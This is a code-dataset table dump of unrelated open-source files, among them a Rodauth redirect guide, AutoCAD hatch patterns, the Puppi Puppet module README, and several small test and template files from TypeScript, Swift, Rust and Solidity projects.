content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
= Redirect to original page after login
When the user attempts to open a page that requires authentication, Rodauth
redirects them to the login page. It can be useful to redirect them back to
the page they originally requested after successful login. Similarly, you
can do this for pages requiring multifactor authentication.
plugin :rodauth do
enable :login, :logout, :otp
# Have successful login redirect back to originally requested page
login_return_to_requested_location? true
# Have successful multifactor authentication redirect back to
# originally requested page
two_factor_auth_return_to_requested_location? true
end
You can manually set which page to redirect after login or multifactor
authentication, though it is questionable whether the user will desire
this behavior compared to the default.
route do |r|
r.rodauth
# Return the last visited path after login
if rodauth.logged_in?
# Return to the last visited page after multifactor authentication
unless rodauth.two_factor_authenticated?
session[rodauth.two_factor_auth_redirect_session_key] = request.fullpath
end
else
session[rodauth.login_redirect_session_key] = request.fullpath
end
# rest of routes
end
| RDoc | 5 | dmitryzuev/rodauth | doc/guides/login_return.rdoc | [
"MIT"
] |
<div class="carousel-item {{active}} press-carousel" data-bs-interval="10000">
<img
src="{{imageBaseUrl}}/transparent-bg.png"
class="d-block w-100"
alt=""
/>
<div class="carousel-caption">
<img
src="{{imageBaseUrl}}/{{imageName}}"
alt=""
class="img-fluid img-center photo"
/>
<br />
<p class="text-center">
“{{body}}”
</p>
<br />
<p class="fw500 text-center">
<a href="{{url}}">{{source}}</a>
</p>
<p class="fw400 small text-center">By {{author}}</p>
</div>
</div> | HTML+Django | 2 | asahiocean/joplin | Assets/WebsiteAssets/templates/partials/pressCarouselItem.mustache | [
"MIT"
] |
"""Integration platform for recorder."""
from __future__ import annotations
from homeassistant.core import HomeAssistant, callback
from . import ATTR_MAX_TEMP, ATTR_MIN_TEMP, ATTR_OPERATION_LIST
@callback
def exclude_attributes(hass: HomeAssistant) -> set[str]:
"""Exclude static attributes from being recorded in the database."""
return {ATTR_OPERATION_LIST, ATTR_MIN_TEMP, ATTR_MAX_TEMP}
| Python | 4 | mtarjoianu/core | homeassistant/components/water_heater/recorder.py | [
"Apache-2.0"
] |
// ==ORIGINAL==
export { F1, F2 } from "lib";
1;
import { F1, F2 } from "lib";
2;
export * from "lib";
3;
import * as NS from "lib";
4;
F1(); F2(); NS.F1();
// ==ORGANIZED==
export * from "lib";
export { F1, F2 } from "lib";
1;
import * as NS from "lib";
import { F1, F2 } from "lib";
2;
3;
4;
F1(); F2(); NS.F1();
| TypeScript | 3 | nilamjadhav/TypeScript | tests/baselines/reference/organizeImports/MoveToTop_WithExportsFirst.exports.ts | [
"Apache-2.0"
] |
;;
;; Copyright 2017 Autodesk, Inc. All rights reserved.
;;
;; Use of this software is subject to the terms of the Autodesk license
;; agreement provided at the time of installation or download, or which
;; otherwise accompanies this software in either electronic or hard copy form.
;;
;; Version 2.0
;; AutoCAD Hatch Patterns
;;
;;
;; Note: in order to ease migration of this file when upgrading
;; to a future version of AutoCAD, it is recommended that you add
;; your customizations to the User Defined Hatch Patterns section at the
;; end of this file.
;;
;; Note: Dummy pattern description used for 'Solid fill'.
*SOLID, Solid fill
45, 0,0, 0,.125
*ANGLE, Angle steel
0, 0,0, 0,.275, .2,-.075
90, 0,0, 0,.275, .2,-.075
*ANSI31, ANSI Iron, Brick, Stone masonry
45, 0,0, 0,.125
*ANSI32, ANSI Steel
45, 0,0, 0,.375
45, .176776695,0, 0,.375
*ANSI33, ANSI Bronze, Brass, Copper
45, 0,0, 0,.25
45, .176776695,0, 0,.25, .125,-.0625
*ANSI34, ANSI Plastic, Rubber
45, 0,0, 0,.75
45, .176776695,0, 0,.75
45, .353553391,0, 0,.75
45, .530330086,0, 0,.75
*ANSI35, ANSI Fire brick, Refractory material
45, 0,0, 0,.25
45, .176776695,0, 0,.25, .3125,-.0625,0,-.0625
*ANSI36, ANSI Marble, Slate, Glass
45, 0,0, .21875,.125, .3125,-.0625,0,-.0625
*ANSI37, ANSI Lead, Zinc, Magnesium, Sound/Heat/Elec Insulation
45, 0,0, 0,.125
135, 0,0, 0,.125
*ANSI38, ANSI Aluminum
45, 0,0, 0,.125
135, 0,0, .25,.125, .3125,-.1875
;;
;; The following hatch patterns AR-xxxxx
;; come from AEC/Architectural
;;
*AR-B816, 8x16 Block elevation stretcher bond
0, 0,0, 0,8
90, 0,0, 8,8, 8,-8
*AR-B816C, 8x16 Block elevation stretcher bond with mortar joints
0, 0,0, 8,8, 15.625,-.375
0, -8,.375, 8,8, 15.625,-.375
90, 0,0, 8,8, -8.375,7.625
90, -0.375,0, 8,8, -8.375,7.625
*AR-B88, 8x8 Block elevation stretcher bond
0, 0,0, 0,8
90, 0,0, 8,4, 8,-8
*AR-BRELM, Standard brick elevation english bond with mortar joints
0, 0,0, 0,5.334, 7.625,-.375
0, 0,2.25, 0,5.334, 7.625,-.375
0, 2,2.667, 0,5.334, 3.625,-.375
0, 2,4.917, 0,5.334, 3.625,-.375
90, 0,0, 0,8, 2.25,-3.084
90, -0.375,0, 0,8, 2.25,-3.084
90, 2,2.667, 0,4, 2.25,-3.084
90, 1.625,2.667, 0,4, 2.25,-3.084
*AR-BRSTD, Standard brick elevation stretcher bond
0, 0,0, 0,2.667
90, 0,0, 2.667,4, 2.667,-2.667
*AR-CONC, Random dot and stone pattern
50, 0,0, 4.12975034,-5.89789472, 0.75,-8.25
355, 0,0, -2.03781207,7.37236840, 0.60,-6.6
100.45144446,0.59771681,-0.05229344,5.7305871,-6.9397673,0.63740192,-7.01142112
46.1842, 0,2, 6.19462554,-8.84684596, 1.125,-12.375
96.63563549,.88936745,1.86206693,8.59588239,-10.40964966,0.95610342,-10.5171376
351.18416399,0,2, 7.74327494,11.05855746, 0.9,-9.90000001
21, 1,1.5, 4.12975034,-5.89789472, 0.75,-8.25
326, 1,1.5, -2.03781207,7.37236840, 0.60,-6.6
71.45144474, 1.49742254,1.16448426, 5.7305871,-6.9397673, 0.6374019,-7.01142112
37.5, 0,0, 2.123,2.567, 0,-6.52,0,-6.7,0,-6.625
7.5, 0,0, 3.123,3.567, 0,-3.82,0,-6.37,0,-2.525
-32.5, -2.23,0, 4.6234,2.678, 0,-2.5,0,-7.8,0,-10.35
-42.5, -3.23,0, 3.6234,4.678, 0,-3.25,0,-5.18,0,-7.35
*AR-HBONE, Standard brick herringbone pattern @ 45 degrees
45, 0,0, 4,4, 12,-4
135, 2.828427125,2.828427125, 4,-4, 12,-4
*AR-PARQ1, 2x12 Parquet flooring: pattern of 12x12
90, 0,0, 12,12, 12,-12
90, 2,0, 12,12, 12,-12
90, 4,0, 12,12, 12,-12
90, 6,0, 12,12, 12,-12
90, 8,0, 12,12, 12,-12
90, 10,0, 12,12, 12,-12
90, 12,0, 12,12, 12,-12
0, 0,12, 12,-12, 12,-12
0, 0,14, 12,-12, 12,-12
0, 0,16, 12,-12, 12,-12
0, 0,18, 12,-12, 12,-12
0, 0,20, 12,-12, 12,-12
0, 0,22, 12,-12, 12,-12
0, 0,24, 12,-12, 12,-12
*AR-RROOF, Roof shingle texture
0, 0,0, 2.2,1, 15,-2,5,-1
0, 1.33,0.5, -1,1.33, 3,-0.33,6,-0.75
0, 0.5,0.85, 5.2,0.67, 8,-1.4,4,-1
*AR-RSHKE, Roof wood shake texture
0, 0,0, 25.5,12, 6,-5,7,-3,9,-4
0, 6,.5, 25.5,12, 5,-19,4,-6
0, 18,-.75, 25.5,12, 3,-31
90, 0,0, 12,8.5, 11.5,-36.5
90, 6,0, 12,8.5, 11.25,-36.75
90, 11,0, 12,8.5, 10.5,-37.5
90, 18,-0.75, 12,8.5, 11.5,-36.5
90, 21,-0.75, 12,8.5, 11.5,-36.5
90, 30,0, 12,8.5, 11,-37
*AR-SAND, Random dot pattern
37.5, 0,0, 1.123,1.567, 0,-1.52,0,-1.7,0,-1.625
7.5, 0,0, 2.123,2.567, 0,-.82,0,-1.37,0,-.525
-32.5, -1.23,0, 2.6234,1.678, 0,-.5,0,-1.8,0,-2.35
-42.5, -1.23,0, 1.6234,2.678, 0,-.25,0,-1.18,0,-1.35
*BOX, Box steel
90, 0,0, 0,1
90, .25,0, 0,1
0, 0,0, 0,1, -.25,.25
0, 0,.25, 0,1, -.25,.25
0, 0,.5, 0,1, .25,-.25
0, 0,.75, 0,1, .25,-.25
90, .5,0, 0,1, .25,-.25
90, .75,0, 0,1, .25,-.25
*BRASS, Brass material
0, 0,0, 0,.25
0, 0,.125, 0,.25, .125,-.0625
*BRICK, Brick or masonry-type surface
0, 0,0, 0,.25
90, 0,0, 0,.5, .25,-.25
90, .25,0, 0,.5, -.25,.25
*BRSTONE, Brick and stone
0, 0,0, 0,.33
90, .9,0, .33,.5, .33,-.33
90, .8,0, .33,.5, .33,-.33
0, .9,.055, .5,.33, -.9, .1
0, .9,.11, .5,.33, -.9, .1
0, .9,.165, .5,.33, -.9, .1
0, .9,.22, .5,.33, -.9, .1
0, .9,.275, .5,.33, -.9, .1
*CLAY, Clay material
0, 0,0, 0,.1875
0, 0,.03125, 0,.1875
0, 0,.0625, 0,.1875
0, 0,.125, 0,.1875, .1875,-.125
*CORK, Cork material
0, 0,0, 0,.125
135, .0625,-.0625, 0,.35355339, .176776696,-.176776696
135, .09375,-.0625, 0,.35355339, .176776696,-.176776696
135, .125,-.0625, 0,.35355339, .176776696,-.176776696
*CROSS, A series of crosses
0, 0,0, .25,.25, .125,-.375
90, .0625,-.0625, .25,.25, .125,-.375
*DASH, Dashed lines
0, 0,0, .125,.125, .125,-.125
*DOLMIT, Geological rock layering
0, 0,0, 0,.25
45, 0,0, 0,.70710678,.353553390593273762200422181,-.707106781186547524400844362
*DOTS, A series of dots
0, 0,0, .03125,.0625, 0,-.0625
*EARTH, Earth or ground (subterranean)
0, 0,0, .25,.25, .25,-.25
0, 0,.09375, .25,.25, .25,-.25
0, 0,.1875, .25,.25, .25,-.25
90, .03125,.21875, .25,.25, .25,-.25
90, .125,.21875, .25,.25, .25,-.25
90, .21875,.21875, .25,.25, .25,-.25
*ESCHER, Escher pattern
60, 0,0, -.6,1.039230484, 1.1,-.1
180, 0,0, -.6,1.039230484, 1.1,-.1
300, 0,0, .6,1.039230484, 1.1,-.1
60, .1,0, -.6,1.039230484, .2,-1
300, .1,0, .6,1.039230484, .2,-1
60, -.05,.08660254, -.6,1.039230484, .2,-1
180, -.05,.08660254, -.6,1.039230484, .2,-1
300, -.05,-.08660254, .6,1.039230484, .2,-1
180, -.05,-.08660254, -.6,1.039230484, .2,-1
60, -.4,0, -.6,1.039230484, .2,-1
300, -.4,0, .6,1.039230484, .2,-1
60, .2,-.346410161, -.6,1.039230484, .2,-1
180, .2,-.346410161, -.6,1.039230484, .2,-1
300, .2,.346410161, .6,1.039230484, .2,-1
180, .2,.346410161, -.6,1.039230484, .2,-1
0, .2,.173205081, -.6,1.039230484, .7,-.5
0, .2,-.173205081, -.6,1.039230484, .7,-.5
120, .05,.259807621, .6,1.039230484, .7,-.5
120, -.25,.08660254, .6,1.039230484, .7,-.5
240, -.25,-.08660254, .6,1.039230484, .7,-.5
240, .05,-.259807621, .6,1.039230484, .7,-.5
*FLEX, Flexible material
0, 0,0, 0,.25, .25,-.25
45, .25,0, .176776695296,.176776695296, .0625,-.2285533906,.0625,-.353553390593
*GOST_GLASS,glass material
45, 0, 0, 6, -6, 5, -7
45, 2.121320, 0, 6, -6, 2, -10
45, 0, 2.121320, 6, -6, 2, -10
*GOST_WOOD,wood material
90, 0, 0, 0, -6, 10, -2
90, 2, -2, 0, -6, 6, -1.5, 3, -1.5
90, 4, -5, 0, -6, 10, -2
*GOST_GROUND,ground
45, 0, 0, 10, -10, 20
45, 3, 0, 10, -10, 20
45, 6, 0, 10, -10, 20
*GRASS, Grass area
90, 0,0, .707106781,.707106781, .1875,-1.226713563
45, 0,0, 0,1, .1875,-.8125
135, 0,0, 0,1, .1875,-.8125
*GRATE, Grated area
0, 0,0, 0,.03125
90, 0,0, 0,.125
*GRAVEL,Gravel pattern
228.012787504,.72,1.0,12.0413651692039,.0743294146632,.134536,-13.3190880470737
184.969740728,.63,.90,-12.0415166747131,.0433148081592,.230868,-22.85592476123
132.510447078,.40,.88,-14.8659418273816,.061429511683,.162788,-16.1160325960997
267.273689006,.01,.63,-20.0249279039043,.0475651493827,.210238,-20.813558041629
292.833654178,0.0,.42,-12.9999095019474,.048507125026,.206155,-20.4093731280883
357.273689006,.08,.23,-20.0249279039043,.0475651493827,.210238,-20.813558041629
37.6942404667,.29,.22,-16.4011800288558,.0359675000664,.278029,-27.524848548916
72.2553283749,.51,.39,23.0867613281116,.0380969659053,.262488,-25.9863214968134
121.429565615,.59,.64,15.2642639131074,.047404546271,.210950,-20.884073109729
175.236358309,.48,.82,-11.0450488205478,.083045479801,.240832,-11.8007625787923
222.397437798,.24,.84,16.2787889313724,.0321080648114,.311448,-30.8333750047949
138.814074834,1.0,.62,9.2190645101588,.0940720868851,.106301,-10.5238448127347
171.469234390,.92,.69,-13.1528534931484,.0494468176315,.202237,-20.021511416157
225.000000000,.72,.72,0.7071067811865,.7071067811865,.141421,-1.2727925623731
203.198590514,.65,.84,-5.3835637472478,.1313064328928,.076158,-7.5396151058639
291.801409486,.58,.81,-3.156820749011,.185695338158,.107703,-5.2774618071345
30.9637565321,.62,.71,3.6014702879928,.1714985851408,.174929,-5.6560228948453
161.565051177,.77,.80,-2.2135943621183,.3162277660138,.126491,-3.0357866601684
16.3895403340,0.0,.81,10.4401539876873,.0564332648047,.177200,-17.5428451466694
70.3461759419,.17,.86,-11.7045066155395,.0672672793901,.148661,-14.717407747319
293.198590514,.77,1.0,-5.3835637472478,.1313064328928,.152315,-7.4634581058639
343.610459666,.83,.86,-10.4401539876873,.0564332648047,.177200,-17.542845146669
339.443954780,0.0,.19,-5.3838927710229,.117041147157,.170880,-8.3731237453175
294.775140569,.16,.13,-12.0828441168135,.0698430296124,.143178,-14.174643063276
66.8014094864,.78,0.0,5.3835637472487,.1313064328552,.152315,-7.4634581058639
17.3540246363,.84,.14,-13.6013396869991,.0596549986364,.167631,-16.59542361424
69.4439547804,.29,0.0, -5.383892771022,.1170411471946,.085440,-8.4585637453175
101.309932474,.72,0.0,4.1184388379018,.1961161351396,.050990,-5.0480295135928
165.963756532,.71,.05,-3.1529631254726,.2425356250323,.206155,-3.9169506256177
186.009005957,.51,.10,-10.0497393137326,.0523423921723,.191050,-18.9139231745428
303.690067526,.62,.62,-2.2188007849008,.2773500981134,.144222,-3.4613292754640
353.157226587,.7,.5,17.1171966955143,.0397150736497,.251794,-24.9275626240283
60.9453959009,.95,.47,-8.0616726575653,.0971285862325,.102956,-10.192674140987
90, 1,.56, 1.000,1.000, .06,-.940
120.256437164,.49,.13,-8.0619364083848,.0719815751411,.138924,-13.7535199894498
48.0127875042,.42,.25,12.0413651692041,.0743294146212,.269072,-13.1845520470737
0, .60, .45, 1, 1, .26,-.74
325.304846469,.86,.45,12.2063917682497,-.063245553253,.158114,-15.653274300842
254.054604099,.99,.36,4.1208169184605,.1373605639542,.145602,-7.1345078892805
207.645975364,.95,.22,21.4708691170287,.0421824539631,.237065,-23.4694741822594
175.426078740,.74,.11,13.0383438432524,.039872611164,.250799,-24.8290734079689
*HEX, Hexagons
0, 0,0, 0,0.21650635094610966169093079268823, .125,-.25
120, 0,0, 0,0.21650635094610966169093079268823, .125,-.25
60, .125,0, 0,0.21650635094610966169093079268823, .125,-.25
*HONEY, Honeycomb pattern
0, 0,0, .1875,0.10825317547305483084546539634412, .125,-.25
120, 0,0, .1875,0.10825317547305483084546539634412, .125,-.25
60, 0,0, .1875,0.10825317547305483084546539634412, -.25,.125
*HOUND, Houndstooth check
0, 0,0, .25,.0625, 1,-.5
90, 0,0, -.25,.0625, 1,-.5
*INSUL, Insulation material
0, 0,0, 0,.375
0, 0,.125, 0,.375, .125,-.125
0, 0,.25, 0,.375, .125,-.125
;;
;; Hatch Pattern Definition related to ISO/DIS 12011 line types
;;
;; (Width * 5 = Distance between lines)
;;
;; The size of the line segments related to the ISO/DIS 12011 linetypes
;; define the following hatch pattern.
;; The pen width of 1 mm is the base of the definition. To use them with
;; the other ISO/DIS 12011 predefined pen widths, the line has to be scaled
;; with the appropriate value (e.g. pen width 0,5 mm -> ltscale 0.5).
;;
*ACAD_ISO02W100, dashed line
0, 0,0, 0,5, 12,-3
*ACAD_ISO03W100, dashed space line
0, 0,0, 0,5, 12,-18
*ACAD_ISO04W100, long dashed dotted line
0, 0,0, 0,5, 24,-3,.5,-3
*ACAD_ISO05W100, long dashed double dotted line
0, 0,0, 0,5, 24,-3,.5,-3,.5,-3
*ACAD_ISO06W100, long dashed triplicate dotted line
0, 0,0, 0,5, 24,-3,.5,-3,.5,-6.5
0, 0,0, 0,5, -34,.5,-3
*ACAD_ISO07W100, dotted line
0, 0,0, 0,5, .5,-3
*ACAD_ISO08W100, long dashed short dashed line
0, 0,0, 0,5, 24,-3,6,-3
*ACAD_ISO09W100, long dashed double-short-dashed line
0, 0,0, 0,5, 24,-3,6,-3,6,-3
*ACAD_ISO10W100, dashed dotted line
0, 0,0, 0,5, 12,-3,.5,-3
*ACAD_ISO11W100, double-dashed dotted line
0, 0,0, 0,5, 12,-3,12,-3,.5,-3
*ACAD_ISO12W100, dashed double-dotted line
0, 0,0, 0,5, 12,-3,.5,-3,.5,-3
*ACAD_ISO13W100, double-dashed double-dotted line
0, 0,0, 0,5, 12,-3,12,-3,.5,-6.5
0, 0,0, 0,5, -33.5,.5,-3
*ACAD_ISO14W100, dashed triplicate-dotted line
0, 0,0, 0,5, 12,-3,.5,-3,.5,-6.5
0, 0,0, 0,5, -22,.5,-3
*ACAD_ISO15W100, double-dashed triplicate-dotted line
0, 0,0, 0,5, 12,-3,12,-3,.5,-10
0, 0,0, 0,5, -33.5,.5,-3,.5,-3
;;
;; end of ACAD_ISO hatch pattern definition
;;
*LINE, Parallel horizontal lines
0, 0,0, 0,.125
*MUDST, Mud and sand
0, 0,0, .5,.25, .25,-.25,0,-.25,0,-.25
*NET, Horizontal / vertical grid
0, 0,0, 0,.125
90, 0,0, 0,.125
*NET3, Network pattern 0-60-120
0, 0,0, 0,.125
60, 0,0, 0,.125
120, 0,0, 0,.125
*PLAST, Plastic material
0, 0,0, 0,.25
0, 0,.03125, 0,.25
0, 0,.0625, 0,.25
*PLASTI, Plastic material
0, 0,0, 0,.25
0, 0,.03125, 0,.25
0, 0,.0625, 0,.25
0, 0,.15625, 0,.25
*SACNCR, Concrete
45, 0,0, 0,.09375
45, .066291261,0, 0,.09375, 0,-.09375
*SQUARE,Small aligned squares
0, 0,0, 0,.125, .125,-.125
90, 0,0, 0,.125, .125,-.125
*STARS, Star of David
0, 0,0, 0,.216506351, .125,-.125
60, 0,0, 0,.216506351, .125,-.125
120, .0625,.108253176, 0,.216506351, .125,-.125
*STEEL, Steel material
45, 0,0, 0,.125
45, 0,.0625, 0,.125
*SWAMP, Swampy area
0, 0,0, .5,.866025403, .125,-.875
90, .0625,0, .866025403,.5, .0625,-1.669550806
90, .078125,0, .866025403,.5, .05,-1.682050806
90, .046875,0, .866025403,.5, .05,-1.682050806
60, .09375,0, .5,.866025403, .04,-.96
120, .03125,0, .5,.866025403, .04,-.96
*TRANS, Heat transfer material
0, 0,0, 0,.25
0, 0,.125, 0,.25, .125,-.125
*TRIANG, Equilateral triangles
60, 0,0, .1875,.324759526, .1875,-.1875
120, 0,0, .1875,.324759526, .1875,-.1875
0, -.09375,.162379763, .1875,.324759526, .1875,-.1875
*ZIGZAG, Staircase effect
0, 0,0, .125,.125, .125,-.125
90, .125,0, .125,.125, .125,-.125 | Max | 4 | brinkdinges/netDxf | TestDxfDocument/Support/acad.pat | [
"MIT"
] |
fn main() {
let ref
(); //~ ERROR expected identifier, found `(`
}
| Rust | 1 | Eric-Arellano/rust | src/test/ui/parser/issue-15914.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;
import "../KeeperCompatible.sol";
contract KeeperCompatibleTestHelper is KeeperCompatible {
function checkUpkeep(bytes calldata) external override returns (bool, bytes memory) {}
function performUpkeep(bytes calldata) external override {}
function testCannotExecute() public view cannotExecute {}
}
| Solidity | 3 | solidity-external-tests/chainlink | contracts/src/v0.7/tests/KeeperCompatibleTestHelper.sol | [
"MIT"
] |
<%= defined?(partial_iteration_1_iteration) %>
| HTML+ERB | 0 | mdesantis/rails | actionview/test/fixtures/test/_partial_iteration_1.erb | [
"MIT"
] |
// REQUIRES: VENDOR=apple
// REQUIRES: OS=macosx
// RUN: %empty-directory(%t)
// RUN: %target-swift-frontend -typecheck %s -tbd-is-installapi -emit-tbd -emit-tbd-path %t/linker_directives.tbd
// RUN: %FileCheck %s --check-prefix CHECK-HAS --check-prefix CHECK-HAS-NOT < %t/linker_directives.tbd
// RUN: %target-swift-frontend -typecheck %s -emit-tbd -emit-tbd-path %t/linker_directives.tbd
// RUN: %FileCheck %s --check-prefix CHECK-HAS --check-prefix CHECK-HAS-NOT < %t/linker_directives.tbd
@available(OSX 10.8, *)
@_originallyDefinedIn(module: "ToasterKit", macOS 10.15)
public func toast() {}
// CHECK-HAS: $ld$hide$os10.14$_$s10ToasterKit5toastyyF
// CHECK-HAS: $ld$hide$os10.8$_$s10ToasterKit5toastyyF
// CHECK-HAS-NOT-NOT: $ld$hide$os10.15$_$s10ToasterKit5toastyyF
// CHECK-HAS-NOT-NOT: $ld$hide$os10.7$_$s10ToasterKit5toastyyF
| Swift | 4 | hooman/swift | test/TBD/linker-directives.swift | [
"Apache-2.0"
] |
= Puppi: Puppet Knowledge to the CLI
Puppi One and Puppi module written by Alessandro Franceschi / al @ lab42.it
Puppi Gem by Celso Fernandez / Zertico
Source: http://www.example42.com
Licence: Apache 2
Puppi is a Puppet module and a CLI command.
It's data is entirely driven by Puppet code.
It can be used to standardize and automate the deployment of web applications
or to provides quick and standard commands to query and check your system's resources
Its structure provides FULL flexibility on the actions required for virtually any kind of
application deployment and information gathering.
The module provides:
* Old-Gen and Next-Gen Puppi implementation
* A set of scripts that can be used in chain to automate any kind of deployment
* Puppet defines that make it easy to prepare a puppi set of commands for a project deployment
* Puppet defines to populate the output of the different actions
== HOW TO INSTALL
Download Puppi from GitHub and place it in your modules directory:
git clone https://github.com/example42/puppi.git /etc/puppet/modules/puppi
To use the Puppi "Original, old and widely tested" version, just declare or include the puppi class
class { 'puppi': }
To test the Next-Gen version:
class { 'puppi':
version => '2',
}
If you have resources conflicts, do not install automatically the Puppi dependencies (commands and packages)
class { 'puppi':
install_dependencies => false,
}
== HOW TO USE
Once Puppi is installed you can use it to:
* Easily define in Puppet manifests Web Applications deploy procedures. For example:
puppi::project::war { "myapp":
source => "http://repo.example42.com/deploy/prod/myapp.war",
deploy_root => "/opt/tomcat/myapp/webapps",
}
* Integrate with your modules for puppi check, info and log
* Enable Example42 modules integration
== HOW TO USE WITH EXAMPLE42 MODULES
The Example42 modules provide (optional) Puppi integration.
Once enabled for each module you have puppi check, info and log commands.
To eanble Puppi in OldGen Modules, set in the scope these variables:
$puppi = yes # Enables puppi integration.
$monitor = yes # Enables automatic monitoring
$monitor_tool = "puppi" # Sets puppi as monitoring tool
For the NextGen modules set the same parameters via Hiera, at Top Scope or as class arguments:
class { 'openssh':
puppi => yes,
monitor => yes,
monitor_tool => 'puppi',
}
== USAGE OF THE PUPPI COMMAND (OLD GEN)
puppi <action> <project_name> [ -options ]
The puppi command has these possibile actions:
* [ puppi init project_name ] : First time initialization of the defined project
* [ puppi deploy project_name ] : Deploys the defined project
* [ puppi rollback project_name ] : Rollback to a previous deploy state
* [ puppi check ] : Runs project specific and host wide checks
* [ puppi log ] : Tails system wide or project specific logs
* [ puppi info topic_name ] : Show system information (for all or only the specified topic)
* [ puppi todo ] : Show things to do (or done) manually on the system
The deploy/rollback/init actions, puppi run the commands in /etc/puppi/projects/$project_name/$action,
log their status and then run the commands in /etc/puppi/projects/$project_name/report to
provide reporting, in whatever, pluggable, way.
You can also provide some options:
* -f : Force puppi commands execution also on CRITICAL errors
* -i : Interactively ask confirmation for every command
* -t : Test mode. Just show the commands that should be executed without doing anything
* -d <yes|full>: Debug mode. Show debugging info during execution
* -o "parameter=value parameter2=value2" : Set manual options to override defaults. The options must be in parameter=value syntax, separated by spaces and inside double quotes.
Some usage examples:
puppi check : Run host-wide checks.
puppi log : Show system logs
puppi info : Show general system infos (outputs all the topics available)
puppi deploy myapp : Deploys myapp according to the logic defined in Puppet manifests
== THE PUPPI MODULE
The set of commands needed for each of these actions are entirely managed with specific
Puppet "basic defines":
[ puppi::project ] - Creates the main project structure. One or more different deployment projects can exist on a node.
[ puppi::initialize ] - Creates a single command to be placed in the init sequence. It's not required for every project.
[ puppi::deploy ] - Creates a single command to be placed in the deploy sequence. More than one is generally needed for each project.
[ puppi::rollback ] - Creates a single command to be placed in the rollback sequence. More than one is generally needed for each project.
[ puppi::check ] - Creates a single check (based on Nagios plugins) for a project or for the whole host (host wide checks are auto generated by Example42 monitor module)
[ puppi::report ] - Creates a reporting command to be placed in the report sequence.
[ puppi::log ] - Creates a log filename entry for a project or the whole hosts.
[ puppi::info ] - Creates an info entry with the commands used to provide info on a topic
Read details in the relevant READMEs
== FILE PATHS (all of them are provided, and can be configured, in the puppi module):
/usr/sbin/puppi - A link to the actual version of puppi enabled
/usr/sbin/puppi.one - The original puppi bash command.
/etc/puppi/puppi.conf - Puppi (one) main config file. Various puppi wide paths are defined here.
/etc/puppi/checks/ - $checksdir - Here all the host wide checks can be placed. If you use the Example42 monitor module and have "puppi" as $monitor_tool, this directory is automatically filled with Nagios plugins based checks.
/etc/puppi/projects/ - $projectsdir - In this directory you can have one or more projects subdirs, with the commands to be run for deploy, rollback and check actions. They are completely built (and purged) by the Puppet module.
/etc/puppi/scripts/ - $scriptsdir - The general-use scripts directory, these are used by the above commands and may require one or more arguments.
/etc/puppi/logs/ - $logssdir - The general-use directory where files are placed which contain the log paths to be used by puppi log
/etc/puppi/info/ - $infodir - The directory where files are placed which contain the commands used by puppi info
/var/lib/puppi/archive/ - $archivedir - Where all data to rollback is placed.
/var/log/puppi/ - $logdir - Where logs and reports of the different commands are placed.
/tmp/puppi/ - $workdir - Temporary, scratchable, directory where Puppi places temporary files.
/tmp/puppi/$project/config - A runtime configuration file, which is used by all all the the scripts invoked by puppi to read and write dynamic variables at runtime. This is necessary to mantain "state" information that changes on every puppi run (such as the deploy datetime, used for backups).
== HOW TO CUSTOMIZE
It should be clear that with puppi you have full flexibility in the definition of a deployment
procedure, since the puppi command is basically a wrapper that executes arbitrary scripts with
a given sequence, in pure KISS logic.
The advantanges though, are various:
* You have a common syntax to manage deploys and rollbacks on an host
* In your Puppet manifests, you can set in simple, coherent and still flexible and customizable
defines all the elements, you need for your application deployments.
Think about it: with just a Puppet define you build the whole deploy logic
* Reporting for each deploy/rollback is built-in and extensible
* Automatic checks can be built in the deploy procedure
* You have a common, growing, set of general-use scripts for typical actions
* You have quick and useful command to see what's happening on the system (puppi check, log, info)
There are different parts where you can customize the behaviour of puppi:
* The set of general-use scripts in /etc/puppi/scripts/ ( this directory is filled with the content
of puppi/files/scripts/ ) can/should be enhanced. These can be arbitrary scripts in whatever
language. If you want to follow puppi's logic, though, consider that they should import the
common and runtime configuration files and have an exit code logic similar to the one of
Nagios plugins: 0 is OK, 1 is WARNING, 2 is CRITICAL. Note that by default a script that
exits with WARNING doesn't block the deploy procedure, on the other hand, if a script exits
with CRITICAL (exit 2) by default it blocks the procedure.
Take a second, also, to explore the runtime config file created by the puppi command that
contains variables that can be set and used by the scripts invoked by puppi.
* The custom project defines that describe deploy templates. These are placed in
puppi/manifests/project/ and can request all the arguments you want to feed your scripts with.
Generally is a good idea to design a standard enough template that can be used for all the
cases where the deployment procedure involves similar steps. Consider also that you can handle
exceptions with variables (see the $loadbalancer_ip usage in puppi/manifests/project/maven.pp)
== (NO) DEPENDENCIES AND CONFLICTS
Puppi is self contained. It doesn't require other modules.
(And is required by all Example42 modules).
For correct functionality by default some extra packages are installed.
If you have conflicts with your existing modules, set the argument:
install_dependencies => false
| RDoc | 3 | mikiec84/YeoPress | puppet/modules/puppi/README.rdoc | [
"BSD-2-Clause"
] |
CREATE TABLE c(
id INT NOT NULL PRIMARY KEY,
k INT NOT NULL
);
| SQL | 3 | imtbkcat/tidb-lightning | tests/error_summary/data/error_summary.c-schema.sql | [
"Apache-2.0"
] |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Uppy DigitalOcean Example</title>
<link href="uppy.min.css" rel="stylesheet">
</head>
<body>
<h1>DigitalOcean Spaces</h1>
<p>
Using the <a href="https://uppy.io/docs/aws-s3">AwsS3</a> plugin to upload to DigitalOcean Spaces ✌️
</p>
<script src="main.js"></script>
</body>
</html>
| HTML | 2 | profsmallpine/uppy | examples/digitalocean-spaces/index.html | [
"MIT"
] |
/// <reference path="fourslash.ts" />
// @module: commonjs
// @Filename: /node_modules/@types/node/index.d.ts
//// declare module "fs" { function writeFile(): void }
//// declare module "fs/promises" { function writeFile(): Promise<void> }
//// declare module "node:fs" { export * from "fs"; }
//// declare module "node:fs/promises" { export * from "fs/promises"; }
// @Filename: /other.ts
//// import "node:fs/promises";
// @Filename: /index.ts
//// write/**/
verify.completions({
marker: "",
exact: completion.globalsPlus([{
name: "writeFile",
source: "node:fs",
hasAction: true,
sortText: completion.SortText.AutoImportSuggestions
}, {
name: "writeFile",
source: "node:fs/promises",
hasAction: true,
sortText: completion.SortText.AutoImportSuggestions
}]),
preferences: {
includeCompletionsForModuleExports: true,
},
});
